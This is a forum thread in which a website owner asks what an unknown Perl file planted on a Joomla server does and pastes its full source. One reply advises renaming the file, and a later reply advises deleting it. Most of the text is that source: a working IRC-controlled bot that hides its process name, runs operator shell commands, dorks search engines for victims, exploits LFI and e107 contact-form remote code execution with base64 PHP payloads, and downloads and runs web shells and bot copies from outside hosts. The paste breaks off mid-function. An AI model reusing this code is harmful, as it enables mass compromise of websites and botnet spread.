Hacker PERL script on my server?

Question

sazbaztaz 0 Newbie Poster

13 Years Ago

Hello,

I found a PERL script in my root directory (public_html) and I have no idea who uploaded it and how. I know this itself is a concern to me but what I really need to know is what this script can do in worst case scenario. It was on the server for about 48 hours and I don't know what could have happened during this time.

I'm running a website with joomla! so maybe the hacker gained access to "configuration.php", mysql passwords...

Since I don't know PERL I really need your help. I attach the file that was located on the server "public_html" named "escan". Thank you!

perl

This attachment is potentially unsafe to open. It may be an executable that is capable of making changes to your file system, or it may require specific software to open. Use caution and only open this attachment if you are comfortable working with zip files.

escan.zip (6.89 KB)

4 Contributors
8 Replies
1K Views
1 Year Discussion Span
Latest Post 12 Years Ago Latest Post by TerraBlade

Dandello 8 Posting Whiz in Training

13 Years Ago

I get an 'unknown file type' when trying to unzip and look at the file in question. But in general - First rename it! - at least then if someone is accessing things through it, they can't find it but you can still put it back.

Second: Ask your hosting service if it's theirs. Sometimes there are odd looking operational things they don't tell you about.

My suspicion is if that file doesn't belong to the hosting service, then their entire system has been compromised since someone was able to plant this.

Dandello 8 Posting Whiz in Training

13 Years Ago

It looks bad - delete it.

From what I'm seeing, it's set up to capture queries or spiders regarding your site and possibly sending back bad info. At the very least, it's trying to ID who's spidering or accessing your site.

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

sazbaztaz 0 Newbie Poster · Answer 1 · 2011-01-27T02:16:31+00:00

This is odd since I just downloaded the attachment and I was able to open it and read the file 'escan'. This is a file without extension. Ok, I'll post the entire code here. By the way... That is certainly not a hidden file provided by my hosting provider. I host my website with them seven years now and I know the contents of folders inside out. Someone somehow managed to upload this trough the joomla interface. Ok, here is the content of the file...

#!/usr/bin/perl

# globalnet Priv8 Scanner SE v1.2
# Coded by Vrs-hCk
# ander[at]antisecurity.org
# Last Edited: Jun 21 2010

# How to use:
# perl globalnet.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeproc

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
use MIME::Base64;

my $datetime = localtime;

my $fakeproc  = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport   = $ARGV[1];
my $nickname  = $ARGV[2];
my $ident     = $ARGV[3];
my $channel   = '#'.$ARGV[4];
my $admin     = $ARGV[5];
my $fullname  = "( Global.Net )";

my $globalnet    = "15(7@2globalnet15)";
my $lfilogo   = "15(7@2LFI15)";
my $lfdlogo   = "15(7@2LFD15)";
my $e107logo  = "15(7@2e10715)";

my $lficmd    = '`lfi';
my $lfdcmd    = '`xlfd';
my $e107cmd   = '`e107';

my $injector  = "http://live.birthbybaby.com/r57x.txt";
my $botshell  = "http://antrax.us/tools/bot.pl";

my $uagent    = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';
my $lfdtest   = "....//....//....//....//....//....//....//....//....//etc/passwd%0000";
my $lfdoutput = "root:(.+):(.+):(.+):(.+):(.+):(.+)";

if (@ARGV == 7) {
    print "\n[+] globalnet Priv8 Scanner SE\n".
          "[+] IRC Host    : $ircserver\n".
          "[+] IRC Port    : $ircport\n".
          "[+] Bot Nick    : $nickname\n".
          "[+] Bot Ident   : $ident\n".
          "[+] Channel     : $channel\n".
          "[+] Bot Admin   : $admin\n".
          "[+] Process/PID : $fakeproc - $$\n\n";
}
else {
    print "\n[USAGE] perl $0 irc.server.net 6667 nick ident channel admin /usr/sbin/fakeproc\n\n";
    exit();
}

$SIG{'INT'}   = 'IGNORE';
$SIG{'HUP'}   = 'IGNORE';
$SIG{'TERM'}  = 'IGNORE';
$SIG{'CHLD'}  = 'IGNORE';
$SIG{'PS'}    = 'IGNORE';

chdir("/");
$ircserver = "$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0" x 16;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();

sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
        print $IRC_cur_socket "$_[0]\n";
    }
}

sub connector {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
        nick("$mynick");
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep 1;
    }
}

sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
        sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($mynick)) {
            $mynick = $4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    }
    elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$mynick".int rand(999));
    }
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        sendraw("MODE $mynick +Bx");
        sendraw("JOIN $channel");
        sleep(1);
        sendraw("PRIVMSG $channel :Hosted by: 0x69.net - Private ScanneR");
        sendraw("PRIVMSG $admin :Hi $admin im here !!!");
    }
}

my $line_temp;
while( 1 ) {
    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $ircmsg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $ircmsg);
        $ircmsg =~ s/\r\n$//;

        if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
            my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
            if ($path eq $mynick) {
                if ($msg =~ /^PING (.*)/) {
                    sendraw("NOTICE $nick :PING $1");
                }
                if ($msg =~ /^VERSION/) {
                    sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
                }
                if ($msg =~ /^TIME/) {
                    sendraw("NOTICE $nick :TIME ".$datetime."");
                }
                if (&isAdmin($nick) && $msg eq "!die") {
                    &shell("$path","kill -9 $$");
                }
                if (&isAdmin($nick) && $msg eq "!killall") {
                    &shell("$path","killall -9 perl");
                }
                if (&isAdmin($nick) && $msg eq "!reset") {
                    sendraw("QUIT :Restarting...");
                }
                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
                    sendraw("JOIN #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
                    sendraw("PART #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
                    sendraw("NICK ".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!pid/) {
                    sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
                }
                if (&isAdmin($nick) && $msg !~ /^!/) {
                    &shell("$nick","$msg");
                }
            }
            else {
                if (&isAdmin($nick) && $msg eq "!die") {
                    &shell("$path","kill -9 $$");
                }
                if (&isAdmin($nick) && $msg eq "!killall") {
                    &shell("$path","killall -9 perl");
                }
                if (&isAdmin($nick) && $msg eq "!reset") {
                    sendraw("QUIT :Restarting...");
                }
                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
                    sendraw("JOIN #".$1);
                }
                if (&isAdmin($nick) && $msg eq "!part") {
                    sendraw("PART $path");
                }
                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
                    sendraw("PART #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
                    &shell("$path","$1");
                }
                if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
                    &shell("$path","$1");
                }

                ##################################################################### HELP COMMAND

                if ($msg=~ /^!help/) {
                    my $helplogo = "15(7@2Help15)";
                    &notice("$nick","$helplogo 12LFI Vuln Scan:6 $lficmd [bug] [dork]");
                    &notice("$nick","$helplogo 12LFD Vuln Scan:6 $lfdcmd [bug] [dork]");
                    &notice("$nick","$helplogo 12e107 Vuln Scan:6 $e107cmd [bug] [dork]");
                }
                if ($msg=~ /^!response/ || $msg=~ /^!id/) {
                    if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {
                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 3UP");
                    } else {
                        &notice("$nick","15(7@2Injector15)6 PHP Shell is 4Down");
                    }
                }
                if (&isAdmin($nick) && $msg =~ /^!pid/) {
                    &notice("$nick","6Fake Process/PID : $fakeproc - $$");
                }

                ##################################################################### LFD SCAN

                if ($msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) {
                        waitpid($pid, 0);
                    }
                    else {
                        if (fork) { exit; } else {
                            my ($bug,$dork) = ($1,$2);
                            &msg("$path","$lfdlogo 12Dork :4 $dork");
                            &msg("$path","$lfdlogo 12Bugz :4 $bug");
                            &msg("$path","$lfdlogo 6Search Engine Loading ...");
                            &lfd_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
                        }
                        exit;
                    }
                }

                ##################################################################### LFIRCE SCAN

                if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) {
                        waitpid($pid, 0);
                    }
                    else {
                        if (fork) { exit; } else {
                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {
                                my ($bug,$dork) = ($1,$2);
                                &msg("$path","$lfilogo 12Dork :4 $dork");
                                &msg("$path","$lfilogo 12Bugz :4 $bug");
                                &msg("$path","$lfilogo 6Search Engine Loading ...");
                                &lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
                            } else {
                                &msg("$path","[ $nick ] $lfilogo 4PHP Shell is Down!");
                            }
                        }
                        exit;
                    }
                }

                ##################################################################### e107 contact.php SCAN

                if ($msg=~ /^$e107cmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) {
                        waitpid($pid, 0);
                    }
                    else {
                        if (fork) { exit; } else {
                            if (&isFound($injector,"FJ3XiuRZulJfcu7mB13")) {
                                my ($bug,$dork) = ($1,$2);
                                &msg("$path","$e107logo 12Dork :4 $dork");
                                &msg("$path","$e107logo 12Bugz :4 $bug");
                                &msg("$path","$e107logo 6Search Engine Loading ...");
                                &e107_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
                            } else {
                                &msg("$path","[ $nick ] $e107logo 4PHP Shell is Down!");
                            }
                        }
                        exit;
                    }
                }

                #####################################################################

            }
        }

        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line = $line_temp.$line if ($line_temp);
            $line_temp = '';
            $line =~ s/\r$//;
            unless ($c == $#lines) {
                parse("$line");
            } else {
                if ($#lines == 0) {
                    parse("$line");
                } elsif ($lines[$c] =~ /\r$/) {
                    parse("$line");
                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                    parse("$line");
                } else {
                    $line_temp = $line;
                }
            }
        }
    }
}

#########################################

sub lfd_start() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    if ($engine =~ /google/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"GooGLe");
        } exit; }
    }
    if ($engine =~ /alltheweb/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"AllTheWeb");
        } exit; }
    }
    if ($engine =~ /bing/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"Bing");
        } exit; }
    }
    if ($engine =~ /altavista/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"ALtaViSTa");
        } exit; }
    }
    if ($engine =~ /ask/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"AsK");
        } exit; }
    }
    if ($engine =~ /uol/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"UoL");
        } exit; }
    }
    if ($engine =~ /yahoo/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfd($chan,$bug,$dork,"YahOo");
        } exit; }
    }
}

sub lfi_start() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    if ($engine =~ /google/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"GooGLe");
        } exit; }
    }
    if ($engine =~ /alltheweb/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"AllTheWeb");
        } exit; }
    }
    if ($engine =~ /bing/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"Bing");
        } exit; }
    }
    if ($engine =~ /altavista/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"ALtaViSTa");
        } exit; }
    }
    if ($engine =~ /ask/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"AsK");
        } exit; }
    }
    if ($engine =~ /uol/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"UoL");
        } exit; }
    }
    if ($engine =~ /yahoo/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &lfi($chan,$bug,$dork,"YahOo");
        } exit; }
    }
}

sub e107_start() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    if ($engine =~ /google/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"GooGLe");
        } exit; }
    }
    if ($engine =~ /alltheweb/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"AllTheWeb");
        } exit; }
    }
    if ($engine =~ /bing/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"Bing");
        } exit; }
    }
    if ($engine =~ /altavista/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"ALtaViSTa");
        } exit; }
    }
    if ($engine =~ /ask/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"AsK");
        } exit; }
    }
    if ($engine =~ /uol/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"UoL");
        } exit; }
    }
    if ($engine =~ /yahoo/i) {
        if (my $pid = fork) { waitpid($pid, 0); }
        else { if (fork) { exit; } else {
            &e107($chan,$bug,$dork,"YahOo");
        } exit; }
    }
}

#########################################

sub lfd() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $count = 0;
    my @list = search_engine($chan,$bug,$dork,$engine,$lfdlogo);
    my $num = scalar(@list);
    if ($num > 0) {
        foreach my $site (@list) {
            $count++;
            if ($count == $num-1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); }
            my $test = "http://".$site.$bug.$lfdtest;
            my $vuln = "http://".$site."12".$bug."6".$lfdtest;
            my $html = get_content($test);
            if ($html =~ /$lfdoutput/) {
                &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $globalnet");
                sleep(3);
            }
        }
    }
}

sub lfi() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $count = 0;
    my @list = search_engine($chan,$bug,$dork,$engine,$lfilogo);
    my $num = scalar(@list);
    if ($num > 0) {
        foreach my $site (@list) {
            $count++;
            if ($count == $num-1) { &msg("$chan","$lfilogo(7@2$engine15)10 Scan finish for14 $dork"); }
            my $dir = "....//....//....//....//....//....//....//..../";
            my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
            my $vuln = "http://".$site."12".$bug."6".$dir."7/proc/self/environ%0000";
            my $shell = "http://".$site."12".$bug."6".$dir."7/tmp/x-treme%0000";
            my $html = get_content($test);
            if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $code = 'echo "c0li#".php_uname()."#c0li"; if(@copy("'.$injector.'","/tmp/x-treme")) { echo "SUCCESS"; }';
                    my $res = lfi_env_query($test,encode_base64($code));
                    &lfi_spread_query($test);
                    $res =~ s/\n//g;
                    if ($res =~ /c0li#(.*)#c0liSUCCESS/sg) {
                        my $sys = $1;
                        &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHell15)4 ".$shell." 15(7@3".$sys."15)$globalnet");
                        sleep(4);
                    }
                    elsif ($res =~ /c0li#(.*)#c0li/sg) {
                        if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                            my $sys = $1;
                            my $upload = 'system("wget '.$injector.' -O /tmp/x-treme");';
                            my $wget = lfi_env_query($test,encode_base64($upload)); sleep(1);
                            my $check = get_content("http://".$site.$bug.$dir."/tmp/x-treme%0000"); sleep(1);
                            if ($check =~ /Hacked by Vrs-hCk/) {
                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12X-SHeLL15)4 ".$shell." 15(7@3".$sys."15)$globalnet");
                                sleep(4);
                            }
                            else {
                                &msg("$chan","$lfilogo(7@2$engine15)15(13@12SysTem15)4 ".$vuln." 15(7@3".$sys."15)$globalnet");
                                sleep(4);
                            }
                        } exit; }
                    }
                    else { &msg("$chan","$lfilogo(7@2$engine15)15(13@12EnviRon15)4 ".$vuln." $globalnet"); }
                } exit; } sleep(3);
            }
        }
    }
}

sub e107() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $count = 0;
    my @list = search_engine($chan,$bug,$dork,$engine,$e107logo);
    my $num = scalar(@list);
    if ($num > 0) {
        foreach my $site (@list) {
            $count++;
            if ($count == $num-1) { &msg("$chan","$e107logo(7@2$engine15)10 Scan finish for14 $dork"); }
            my $test = "http://".$site.$bug;
            my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
            my $html = e107_rce_query($test,$code);
            if ($html =~ /v0pCr3w<br>sys:(.+?)<br>globalnetCr3w/) {
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $sys = $1;
                    my $upload = 'if(@copy("'.$injector.'","index2.php")) { echo "c0liSUKSESc0li"; }';
                    my $res = e107_rce_query($test,encode_base64($upload));
                    if ($res =~ /c0liSUKSESc0li/) {
                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12index2.php 15(7@3".$sys."15)(7@12safemode-off15)");
&msg("ScanneD","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12index2.php 15(7@3".$sys."15)(7@12safemode-off15)");
                        sleep(5);
                    }
                    else {
                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@12safemode-off15)");

                        sleep(5);
                    }
                    &e107_spread_query($test);
                    sleep(2);
                } exit; } sleep(5);
            }
            elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $sys = $1;
                    my $upload = 'if(@copy("'.$injector.'","index2.php")) { echo "c0liSUKSESc0li"; }';
                    my $res = e107_rce_query($test,encode_base64($upload));
                    if ($res =~ /c0liSUKSESc0li/) {
                        &msg("$chan","$e107logo(7@2$engine15)15(13@12e107-SheLL15)10 http://".$site."12index2.php 15(7@3".$sys."15)(7@4safemode-on15)");
                        sleep(5);
                    }
                    else {
                        &msg("$chan","$e107logo(7@2$engine15)15(13@12Vuln15)10 ".$test." 15(7@3".$sys."15)(7@4safemode-on15)");
                        sleep(5);
                    }
                } exit; } sleep(5);
            }
        }
    }
}

#########################################

sub search_engine() {
    my (@total,@clean);
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $logo = $_[4];
    if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
    if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
    if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
    if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
    if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
    if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
    if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
    @clean = clean(@total);
    &msg("$chan","$logo(7@2$engine15)12 Total:4 (".scalar(@total).")12 Clean:4 (".scalar(@clean).")");
    return @clean;
}

#########################################

sub rfi_os() {
    my $sys = "";
    my $url = $_[0];
    my $chk = get_content($url);
    if ($chk =~ /<br>sys:(.+?)<br>/sg) { $sys = $1; }
    return $sys;
}

sub rce_os() {
    my $sys = "";
    my $url = $_[0];
    my $chk = get_content($url);
    $chk =~ s/\n//;
    if ($chk =~ /999(.*)666/sg) { $sys = $1; }
    return $sys;
}

sub isFound() {
    my $status = 0;
    my $link = $_[0];
    my $reqexp = $_[1];
    my $res = get_content($link);
    if ($res =~ /$reqexp/) { $status = 1 }
    return $status;
}

sub get_content() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(10);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}

sub lfi_env_query() {
    my $url = $_[0];
    my $code = $_[1];
    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
    $ua->timeout(10);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}

sub lfi_spread_query() {
    my $url = $_[0];
    my $botnick = 'x-bot['.(int rand(6666)).']';
    my $botchan = $channel;
    $botchan =~ s/\#//;
    my $code = "system('rm -rf /tmp/x-bot;wget $botshell -O /tmp/x-bot;perl /tmp/x-bot $ircserver $ircport $botnick xbot $botchan $admin /usr/bin/php');";
    my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
    $ua->timeout(5);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
}

sub e107_rce_query() {
    my $url = $_[0];
    my $code = $_[1];
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(10);
    my $res = $ua->request($req);
    return $res->content;
}

sub e107_spread_query() {
    my $url = $_[0];
    my $code = "ICRjbWQ9ImNkIC90bXA7d2dldCBodHRwOi8vd3d3LmhvdHRlcm5lbGwuY29tL2ltYWdlcy9fdnRpX2NuZi9zcHIudHh0O3Blcmwgc3ByLnR4dDtwZXJsIHNwci50eHQ7cm0gLXJmIHNwci50eHQiOw0KJGVzZWd1aWNtZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnOw0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9IA==";
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'));die;[/php]");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(10);
    my $res = $ua->request($req);
}

######################################### SEARCH ENGINE

sub google() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub alltheweb() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100) {
        my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) {
            my $link = $1;
            $link =~ s/ //g;
            my @grep = links($link);
            push(@list,@grep);
        }
    }
    return @list;
}

sub uol() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10) {
        my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
            my $link = $1;
            if ($link !~ /busca|uol|yahoo/) {
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub bing() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10) {
